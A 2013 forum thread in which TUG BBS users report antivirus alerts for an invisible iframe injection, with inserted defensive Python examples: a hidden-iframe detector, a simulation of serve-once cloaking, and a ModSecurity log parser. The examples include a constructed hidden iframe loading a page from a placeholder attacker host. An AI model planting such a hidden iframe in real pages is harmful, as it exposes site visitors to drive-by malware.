# TUG Blacklisted again?



## Blues (May 15, 2013)

My work computer has Symantec Endpoint Protection installed.  Today, it's again giving me popups when I browse to TUG BBS.  It's reporting SID 25616, described here:

http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=25616

Is this just a case of a cached blacklist getting re-published?  Or is there actually an infection in TUG BBS now?

-Bob


----------



## TUGBrian (May 15, 2013)

Have had one other report of this today... are investigating it now.


----------



## SmithOp (May 15, 2013)

Shows up here.

http://www.mxtoolbox.com/SuperTool.aspx?action=mx:Tugbbs.com&run=toolpage#


----------



## TUGBrian (May 15, 2013)

Yep, identified it... working to clean now.


----------



## TUGBrian (May 15, 2013)

And now the scan shows it's clean... this is ridiculous.


----------



## jeffwill (May 15, 2013)

I logged on 5 minutes ago and had my threat detector alarm sound off.  Is this related, or some spasm in my computer?


----------



## TUGBrian (May 15, 2013)

Is it still doing it now?


----------



## TUGBrian (May 15, 2013)

Even the site scanner I used a few minutes ago to confirm a JavaScript warning is now showing that's gone and the site is clean.

lkajsd;lkfjasdkf  not this again


----------



## TUGBrian (May 15, 2013)

Guessing that no one who previously was getting an error is currently getting one?


----------



## pedro47 (May 16, 2013)

jeffwill said:


> I logged on 5 minutes ago and had my threat detector alarm sound off.  Is this related--- or some spasm in my computer ?



I received this message this morning on my home computer.  I am not at work no problem.

Brian, what is going on ?


----------



## Arnie (May 16, 2013)

*None Here*

Just logged on from Edisto Beach ATT WiFi.
Nothing noted here. Appears to be cleaned.


----------



## T_R_Oglodyte (May 16, 2013)

I got it when logging on just now.  Picked up by my AVG antivirus.

Reported as an invisible iframe injection:



> You searched for Invisible IFrame Injection (type 1707), which is detected by AVG and is part of the Invisible IFrame Injection family. The most popular variants of Invisible IFrame Injection are Invisible IFrame Injection (type 1707), Invisible IFrame Injection (type 1711)
> What is Invisible IFrame Injection?
> 
> An Invisible IFrame Injection happens when an unwanted and hidden third-party page is inserted into a webpage by an attacker. To hide the injection, hackers make the style of the IFrames invisible. Like most malware, an Invisible IFrame Injection exploits vulnerabilities in the system and browsers of the visitors of the website and forces adware, phishing programs or any other type of fraudulent software to be installed on their device.


----------



## richardm (May 16, 2013)

I also received a malicious malware threat warning just now.


----------



## TUGBrian (May 16, 2013)

As many details as you can provide from your virus scanners would be helpful.


----------



## TUGBrian (May 16, 2013)

This is clearly another browser- or OS-specific thing yet again...

For any of you who are indeed getting an AV warning, visit this site right after the warning to see if you can get it to return a result:

http://sitecheck.sucuri.net/scanner/


----------



## TUGBrian (May 16, 2013)

So this appears to be sneaky, and should only trigger once per IP address/operating system, and even browser type, according to something I dug up in searches.

It does this to prevent detection and/or reproduction by admins etc. trying to track down its source.

I found a large article on it (or what I believe to be it) that I've forwarded on to our hosting company in hopes they can wipe it out for good.  Sadly I am pretty sure I mentioned this when it happened 6 months ago and they told me "it wasn't possible"... at this point I can't see how it's not the cause, as it describes the issue perfectly.

That said, I would suggest using current and updated (and active vs. passive) antivirus software when browsing TUG for the time being, just in case!


----------
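Two things in this thread are worth seeing in code: the "invisible iframe" that AVG and Sophos describe (a frame present in the markup but hidden from the viewer), and the serve-once behaviour TUGBrian describes, where the frame is served only the first time a given IP/browser combination visits, so an admin's second scan comes back clean. The following is an added example, not code from TUG, its host, or any of the scanners named in the thread. It implements a hidden-iframe audit on raw HTML and a simulated serve-once server to show why a single re-scan misses the implant while scanning from a fresh identity finds it. The HTML, the IP addresses and the `attacker.invalid` URL are all constructed placeholders, and the serve-once model is an assumption about the implant's behaviour taken from the thread, not its real code.

```python
"""Hidden-iframe audit plus a model of serve-once cloaking.

Added example for the TUG thread, not code from TUG, its host or any AV
vendor.  Every page, IP and URL below is constructed; attacker.invalid is a
reserved placeholder domain, not a real indicator.
"""
import re
from html.parser import HTMLParser

# Inline-style fragments that hide an element from the viewer while the
# browser still fetches and executes its content.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:left|top)\s*:\s*-\d{3,}",   # pushed hundreds/thousands of px off-screen
    re.I,
)


def _tiny(value):
    """True for width/height attribute values of 0 or 1 (with or without 'px')."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1


class IframeAuditor(HTMLParser):
    """Collects <iframe> tags that are present in the markup but invisible to a user."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 or 0x0 dimensions")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden via inline style")
        if reasons:
            self.findings.append({"line": self.getpos()[0],
                                  "src": a.get("src", ""),
                                  "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of findings (line, src, reasons) for hidden iframes in `html`."""
    p = IframeAuditor()
    p.feed(html)
    p.close()
    return p.findings


# Constructed pages.  The injected frame follows the pattern AVG's write-up
# describes: a third-party page in a frame styled so the visitor never sees it.
CLEAN_PAGE = """<html><head><title>TUG BBS</title></head>
<body><div id="content">Forum index</div></body></html>"""
INJECTED_IFRAME = ('<iframe src="http://attacker.invalid/in.php" width="1" height="1" '
                   'style="visibility:hidden;position:absolute;left:-9999px"></iframe>')
INFECTED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED_IFRAME + "</body>")


class ServeOnceInjector:
    """Simulation (an assumption based on the thread, not the real implant) of a
    server that emits the injected frame only the first time a given
    (client IP, browser family) pair visits, then serves a clean page to that pair."""

    def __init__(self):
        self.served = set()

    def render(self, client_ip, ua_family):
        key = (client_ip, ua_family)
        if key in self.served:
            return CLEAN_PAGE
        self.served.add(key)
        return INFECTED_PAGE


def differential_scan(site, probes):
    """Fetch the page under several (ip, ua) identities, in order, and report
    for each probe whether a hidden iframe was present.  Repeating one identity
    (what a site scanner re-run does) misses a serve-once implant; varying the
    identity surfaces it."""
    return [((ip, ua), bool(find_hidden_iframes(site.render(ip, ua))))
            for ip, ua in probes]


if __name__ == "__main__":
    site = ServeOnceInjector()
    probes = [("198.51.100.10", "Chrome"),    # admin's first look: infected
              ("198.51.100.10", "Chrome"),    # admin re-scans: "clean"
              ("198.51.100.10", "Firefox"),   # same IP, other browser: infected again
              ("203.0.113.5", "Chrome")]      # a new visitor: infected
    for ident, hit in differential_scan(site, probes):
        print(ident, "HIDDEN IFRAME" if hit else "clean")
```

The practical lesson for an admin chasing a report like the ones in this thread: do not trust a single clean re-scan from the same machine and browser. Fetch the page from an address and user agent the site has not seen (a phone on mobile data with a different browser is the cheapest way), save the raw HTML rather than viewing it in a browser, and run it through an audit like the one above, which looks at the markup itself rather than at what is rendered.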



## geekette (May 16, 2013)

Got it yesterday at work; I was prevented from accessing the site due to some malicious hoo hah.  Didn't note the message (sorry), just moved on.  Did not attempt again yesterday.

Got right in today with no problems, messages, etc.

I was / am using Firefox.


----------



## easyrider (May 16, 2013)

I'm using Microsoft Security Essentials and the free version of SUPERAntiSpyware and haven't had any problem with TUG.


----------



## TUGBrian (May 16, 2013)

Yea, it's definitely an annoying little bugger... and definitely only impacts a small % of visitors.

I've been holding off on the newsletter all day as I don't want to send links to the BBS to nearly 50,000 people with a chance of some of them getting infected.

*sigh


----------



## Chetan Savade (May 17, 2013)

@Blues 

Hi,

I am Chetan Savade from Symantec Technical Support team.

Do you still get this warning message?

If need any help from my end please let me know.

Regards,
Chetan Savade


----------



## TUGBrian (May 17, 2013)

I highly doubt this individual is from Symantec, FYI... since his email is a Gmail one.


----------



## TUGBrian (May 17, 2013)

Looks like our support team has finally identified something that "isn't supposed to be there".

Sadly, it's the same thing they said "wasn't possible" when this happened 6 months ago... so hopefully it's caught it for good.

I'll send out the newsletter here shortly.


----------



## Jaybee (May 17, 2013)

I hope it's all gone now.  When I first tried to log in this morning, I got the same thing Steve got...the warning from AVG. I went in another way, and there was no problem...???? Onward...and Upward!  We shall overcome..(and all that jazz)


----------



## TUGBrian (May 17, 2013)

Appears our host is suggesting we reimage the server yet again... while it was down for longer than expected last time, at least it was relatively painless.

So I'll schedule this for sometime late at night this coming week.


----------



## geekette (May 17, 2013)

I just got the nastygram again, Firefox.

Blocked request:  file contains malicious code (specifically, tugbbs.com/forums)

Threat:  Troj/iframe-IP

This is Sophos web protection feedback

Just got right in on IE


----------



## TUGBrian (May 17, 2013)

I'll try to schedule the reimage sooner rather than later.


----------



## Smokatoke (May 17, 2013)

Just got a Symantec warning when visiting...


----------



## TUGBrian (May 17, 2013)

This is being scheduled for 4am Sunday morning (or late Sat night, depending on how you look at it).


----------



## caneil (May 17, 2013)

*Norton Sent a Red Flag*

Norton just notified me of a prevented attack.


----------



## TUGBrian (May 18, 2013)

Quick tool to disable iframes in Internet Explorer!

1. Open Internet Explorer, select Tools | Internet Options
2. Click the Security tab
3. Choose the desired zone (Internet, Local intranet, Trusted sites, or Restricted Sites) and click Custom Level
4. Scroll down to Launching programs and files in an IFRAME
5. Select Disable to prevent iframes altogether or Prompt if you wish to decide on a site-by-site basis.
6. Click OK
7. Repeat for each of the desired security zones.
8. Click OK to exit the Internet Options menu.


----------



## TUGBrian (May 18, 2013)

This should disable iframes in Opera:

Ctrl+F12 -> Advanced -> Content -> Style Options -> uncheck Enable inline frames


----------



## TUGBrian (May 18, 2013)

Also note the server hosting TUG2.NET and these forums will be taken offline tonight at approx 3am and will be down for a few hours while they are reimaged to fix this problem yet again.

You can still access TUG member-only features via http://tug2.com


----------



## TUGBrian (May 18, 2013)

This starts in about 4 hours; please note again the servers will be offline for an undetermined amount of time (although I fully expect it to be done before noon etc.).


----------



## Makai Guy (May 19, 2013)

Seems to have gone without a hitch.  

I have my fingers crossed that this eliminates the exploit (yet again ...)


----------



## TUGBrian (May 19, 2013)

Yep, all looks done... other than a minor issue on tug2.net, all appears well with the reimage!


----------



## siesta (May 19, 2013)

Good thing I only visit TUG from my iPad.


----------



## linsj (May 22, 2013)

I'm on a public network with Hotspot Shield protection right now. It's telling me this site has a malware infection and is blocking it.


----------



## TUGBrian (May 22, 2013)

That's likely one of the "blacklist pages" that hasn't updated yet... vs. a local antivirus software.

We ran into that last time... once a site gets reported it takes ages for it to come off the blacklist part.

Can you give me more details on the error, just to be sure?


----------



## linsj (May 22, 2013)

TUGBrian said:


> That's likely one of the "blacklist pages" that hasn't updated yet... vs. a local antivirus software.
> 
> We ran into that last time... once a site gets reported it takes ages for it to come off the blacklist part.
> 
> Can you give me more details on the error, just to be sure?



I can't remember exactly, but it was something about a reported malicious malware. So your assumption is correct.


----------



## TUGBrian (May 22, 2013)

I certainly still want to be sure!  (Although no one else has reported an issue since the reimage... so the odds are low.)

Let me know if you go back to that place please!


----------



## linsj (May 23, 2013)

Here's the exact message:
Warning: This is a reported infected by malware page, blocked by Hotspot Shield.


----------



## TUGBrian (May 23, 2013)

Yea... that's just on a blacklist somewhere that hasn't been updated... I'll see if I can find a way to petition whatever list they are using.


----------



## Blues (May 23, 2013)

Sorry I dropped this on everyone and then went away.  I almost forgot I had reported it, because after the first day, I never saw it again.  So, all appears in order from here, the OP.

-Bob


----------



## czar (May 29, 2013)

May well be user error on my end, but Monday night and all day yesterday, TUG did not work on my home network on any of my devices (iPad, iPhone, or MacBook).  It was fine loading via tethering to my phone, and it was fine on my work network.  I did clear my cache and settings, history, etc., but still no go.  I'll try again tonight but thought that it was weird that it was blocked when every other website I tried worked.


----------



## timeos2 (May 29, 2013)

czar said:


> May well be user error on my end, but Monday night and all day yesterday, TUG did not work on my home network on any of my devices (iPad, iPhone, or MacBook).  It was fine loading via tethering to my phone, and it was fine on my work network.  I did clear my cache and settings, history, etc., but still no go.  I'll try again tonight but thought that it was weird that it was blocked when every other website I tried worked.



I have noted an issue similar to yours. Some specific routers will not let you get to TUG - most will. I'm guessing that whatever it is that is triggering some to block it will get worse over time and eventually steps will have to be taken to figure out what/where is causing the issue.  Although it is very limited I have seen it on multiple machines & different smartphones. It can be caused or undone by simply changing what source router the device(s) are currently using. It is clearly some type of security block as the error starts out as a rights issue then blocks the sites (all of them not just the BBS).  If I simply change what router that device is connecting to the problem disappears. Changing back immediately puts the block back on.  I've never seen anything quite like it before. It will be interesting to find out (eventually) what is happening.


----------



## TUGBrian (May 29, 2013)

If you are unable to access TUG like this, it could certainly be a security rule being tripped (we disabled one last night that kept some folks from posting).

Should this happen to you, email me the date/time it happened... and your IP address.

You can get your IP address easily from http://whatismyip.liquidweb.com

Should easily be able to track down the issue with that info from you.


----------
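The request above (send the date/time and your IP) is the standard way to trace a tripped server-side security rule: the admin takes those two values to the rule engine's log, filters by client address within a time window, and reads off which rule fired and on what URI. As an added example, not TUG's or its host's tooling, here is that correlation step in Python. It assumes the host runs Apache with ModSecurity 2.x and that denials land in the Apache error log in that engine's `[client ...] ModSecurity: ... [id "..."] [msg "..."] [uri "..."]` format; the thread never says which engine is actually in use, so that is an assumption, and every log line, IP address, rule id and message below is constructed.

```python
"""Correlate a visitor's reported IP and time with ModSecurity denials.

Added example, not TUG's or its host's tooling.  Assumes Apache + ModSecurity 2.x
error_log lines (2.2 style "[error]" or 2.4 style "[:error] [pid N]"); the thread
does not say which rule engine the host runs.  All sample lines are constructed
and the rule ids/messages are illustrative only.
"""
import re
from datetime import datetime, timedelta

# Constructed sample.  203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
[Tue May 28 21:14:03 2013] [error] [client 203.0.113.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "union.*select" at ARGS:message. [file "/etc/modsecurity/crs_41_sql_injection.conf"] [line "77"] [id "950901"] [msg "SQL Injection Attack"] [uri "/forums/newreply.php"]
[Tue May 28 21:14:05 2013] [error] [client 203.0.113.7] File does not exist: /var/www/favicon.ico
[Tue May 28 22:40:11 2013] [error] [client 198.51.100.22] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs_21_protocol_anomalies.conf"] [line "47"] [id "960015"] [msg "Request Missing an Accept Header"] [uri "/forums/"]
[Wed May 29 09:02:44 2013] [error] [client 203.0.113.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "union.*select" at ARGS:message. [file "/etc/modsecurity/crs_41_sql_injection.conf"] [line "77"] [id "950901"] [msg "SQL Injection Attack"] [uri "/forums/newreply.php"]
"""

# Apache error_log prefix, then the ModSecurity message.  Port suffix on the
# client address (Apache 2.4) is tolerated and dropped.
LINE_RE = re.compile(
    r'^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4})\] '
    r'\[:?error\](?: \[pid [^\]]+\])? '
    r'\[client (?P<ip>[^\]\s:]+)(?::\d+)?\] '
    r'(?P<msg>ModSecurity: .*)$'
)
# The trailing [key "value"] pairs ModSecurity appends to each denial.
KV_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')


def parse_modsec_lines(text):
    """Return a list of denial events; non-ModSecurity error lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        fields = dict(KV_RE.findall(m["msg"]))
        events.append({"time": ts, "ip": m["ip"],
                       "id": fields.get("id"), "msg": fields.get("msg"),
                       "uri": fields.get("uri")})
    return events


def _as_datetime(when):
    # Accept either a datetime or an ISO-8601 string such as "2013-05-28T21:15:00".
    return datetime.fromisoformat(when) if isinstance(when, str) else when


def denials_near(events, client_ip, reported_time, window_minutes=15):
    """Denials for `client_ip` within +/- window_minutes of the reported time.
    Use a generous window: visitors report their own clock and time zone, and
    the log is in the server's."""
    centre = _as_datetime(reported_time)
    lo, hi = centre - timedelta(minutes=window_minutes), centre + timedelta(minutes=window_minutes)
    return [e for e in events if e["ip"] == client_ip and lo <= e["time"] <= hi]


def rule_ids_for(events, client_ip, reported_time, window_minutes=15):
    """Sorted, de-duplicated rule ids that fired for that visitor in the window;
    these are what you would tune or disable (as TUGBrian did) rather than the whole engine."""
    return sorted({e["id"] for e in denials_near(events, client_ip, reported_time, window_minutes)})


if __name__ == "__main__":
    # A visitor writes in: "about 9:15 pm on May 28, my IP is 203.0.113.7".
    evts = parse_modsec_lines(SAMPLE_LOG)
    for e in denials_near(evts, "203.0.113.7", "2013-05-28T21:15:00"):
        print(e["time"], e["ip"], e["id"], e["msg"], e["uri"])
    print("rules to review:", rule_ids_for(evts, "203.0.113.7", "2013-05-28T21:15:00"))
```

One caveat this makes visible: a rule that fires on ordinary forum text (a post containing the words "union" and "select", in the sample) looks identical in the log to a real attack, so the `uri` and the matched argument are what tell you whether to whitelist that rule for that path or leave it on.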



## linsj (Jun 13, 2013)

Still getting the same message with Hotspot Shield that I reported in #41.


----------



## TUGBrian (Jun 13, 2013)

I've had no luck in getting any sort of communication with them to even inquire about their "list"... I'm sorry.


----------



## linsj (Jun 14, 2013)

TUGBrian said:


> I've had no luck in getting any sort of communication with them to even inquire about their "list"... I'm sorry.



Thanks for trying. At least I know the site is safe and can still get to it.


----------

